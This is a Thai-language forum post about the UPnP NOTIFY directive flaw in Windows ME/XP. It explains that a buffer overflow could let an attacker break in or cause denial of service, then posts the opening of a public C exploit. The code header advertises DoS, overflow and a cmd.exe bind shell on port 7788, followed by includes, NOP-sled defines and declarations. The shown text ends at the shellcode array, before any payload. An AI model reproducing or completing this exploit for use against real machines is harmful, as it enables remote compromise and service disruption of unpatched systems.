**Hidden Content: To see this hidden content your post count must be 1 or greater.**
**Hidden Content: To see this hidden content your post count must be 1 or greater.**
เอาเท่าที่ทราบนะครับ
NOTIFY directive
คือ ส่วนประกอบหนึ่งของ UPnP (Universal Plug and Play) ระบบที่ทำการตรวจสอบการเพิ่มลดของ hardware เพื่อให้สามารถทำงานแบบ Plug&Play ได้ตัวอย่างเช่น เมื่อมีอุปกรณ์ network ใหม่เสียบเข้ากับเครื่องระบบนี้จะทำการแจ้ง NOTIFY directive ออกมาบอกให้กับเครื่องอื่นใน Network ที่ได้ทำการ Enable UPnP. ด้วยเหตุนี้เองหากผู้ไม่หวังดีทำการใช้ Technique buffer overflow แทรกคำสั่งที่ไม่พึงประสงค์ลงไปในระบบนี้ได้อาจจะทำให้ Hacker สามารถเจาะเข้าไปยังระบบของเป้าหมายได้ หรือไม่ก็อาจจะสามารถทำการโจมตีแบบ Denial of Service ไปยังเครื่องเป้าหมายได้
เท่าที่ทราบตอนนี้ ก็มี Code Exploit ให้ศึกษาสองดูด้านล่างนี้
[hide=15][code]/*
* WinME/XP UPNP dos & overflow
*
* Run: ./XPloit host <option>
*
* Windows run the "Universal Plug and Play technology" service
* at port 5000. In the future this will allow for seemless
* connectivity of various devices such as a printer.
* This service have a DoS and a buffer overflow I exploit here.
*
* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@ciudad.com.ar
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
/***************************************************************************/
int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
unsigned char shellcode[] =
Actions : (View-Readers)
There are no names to display.